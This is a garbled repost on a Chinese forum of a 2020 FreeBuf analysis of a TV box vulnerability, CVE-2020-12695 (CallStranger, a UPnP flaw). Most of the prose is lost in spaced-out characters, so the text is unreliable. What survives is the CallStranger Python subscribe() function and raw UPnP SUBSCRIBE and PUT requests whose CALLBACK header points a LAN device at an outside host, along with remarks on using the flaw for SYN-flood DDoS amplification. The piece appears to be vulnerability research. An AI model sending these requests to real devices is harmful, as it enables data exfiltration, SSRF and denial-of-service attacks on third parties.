[15744] 2020-08-18_一次对电视盒子的漏洞分析

文档创建者:s7ckTeam
浏览次数:9
最后更新:2025-01-18
2020-08-18_一次对电视盒子的漏洞分析 _   F r e e B u f   2 0 2 0 - 0 8 - 1 8 使 i p 1 9 2 . 1 6 8 . 1 0 1 . 2 2 4 9 1 5 2 U p n p 6 U P n P C V E - 2 0 2 0 - 1 2 6 9 5 U P n P   2 0 2 0 - 0 4 - 1 7 S U B S C R I B E U P n P U n i v e r s a l   P l u g   a n d   P l a y U P n P 使 U P n P ( E v e n t i n g ) U P n P U P n P 广 U P n P U P n P U P n P N T C A L L B A C K
C A L L B A C K U R L N T u p n p : e v e n t U P n P C A L L B A C K U R L U P n P U R L U R L H T T P ( h t t p : / / ) h t t p s : / / g i t h u b . c o m / y u n u s c a d i r c i / C a l l S t r a n g e r C a l l S t r a n g e r p y t h o n 3   s e t u p . p y   i n s t a l l s u b s c r i b e h e a d e r C A L L B A C K C A L L B A C K u r l 2 0 0 p y t h o n 3   C a l l S t r a n g e r . p y U p n p T V d e f   s u b s c r i b e ( U R L , c a l l b a c k U R L ) :         m y h e a d e r s   =   {         ' U s e r - A g e n t ' : ' C a l l s t r a n g e r   V u l n e r a b i l i t y   C h e c k e r ' ,         ' C A L L B A C K ' :   ' < ' + c a l l b a c k U R L + ' > ' ,         ' N T ' :   ' u p n p : e v e n t ' ,         ' T I M E O U T ' :   ' S e c o n d - 3 0 0 ' }           # p r i n t ( U R L , c a l l b a c k U R L , ' s e n d i n g ' )         r e q   =   r e q u e s t s . r e q u e s t ( ' S U B S C R I B E ' ,   U R L , h e a d e r s = m y h e a d e r s )         i f   r e q . s t a t u s _ c o d e = = 2 0 0 :                 p r i n t ( c o l o r e d ( ' S u b s c r i b e   t o   ' + U R L + '   s e e m s   s u c c e s s f u l l ' , ' g r e e n ' ) )                 p r i n t ( r e q . h e a d e r s )                 p r i n t ( r e q . t e x t )         e l s e :                 p r i n t ( c o l o r e d ( ' S u b s c r i b e   t o   ' + U R L + '   f a i l e d   w i t h   s t a t u s   c o d e : ' + s t r ( r e q . s t a t u s _ c o d e ) , ' r e d ' ) )                 p r i n t ( r e q . h e a d e r s )                 p r i n t ( r e q . t e x t )
s e s s i o n
s e s s i o n t o k e n p u t k e y t o k e n k e y S U B S C R I B E P U T   / C a l l S t r a n g e r . p h p ? c = g e t s e r v i c e s & t o k e n = x x x   H T T P / 1 . 1 H o s t :   2 0 . 4 2 . 1 0 5 . 4 5 U s e r - A g e n t :   p y t h o n - r e q u e s t s / 2 . 2 2 . 0 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * C o n n e c t i o n :   k e e p - a l i v e C o n t e n t - L e n g t h :   0 S U B S C R I B E   / _ u r n : s c h e m a s - u p n p - o r g : s e r v i c e : A V T r a n s p o r t _ e v e n t   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 0 1 . 2 2 : 4 9 1 5 2 U s e r - A g e n t :   C a l l s t r a n g e r   V u l n e r a b i l i t y   C h e c k e r A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t :   * / * C o n n e c t i o n :   k e e p - a l i v e C A L L B A C K :   < h t t p : / / 2 0 . 4 2 . 1 0 5 . 4 5 : 8 0 / C a l l S t r a n g e r . p h p ? c = a d d s e r v i c e & s e r v i c e = g A A A A A B f H - v G u H s X h A u U 7 3 s w . . . . . . . . . = & t o k e n = . . . . . . . . > N T :   u p n p : e v e n t T I M E O U T :   S e c o n d - 3 0 0 C o n t e n t - L e n g t h :   0
2 0 0 C A L L B A C K u r l D d o s U p n p 1 0 7 S Y N 1 0 7 S Y N 2 5 1 0 7 6 0 T C P   S Y N 1 0 7 6 0 / 2 5 = 2 5 6 1 2 5 6 4 1 2
U P n P U P n P I P I P

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则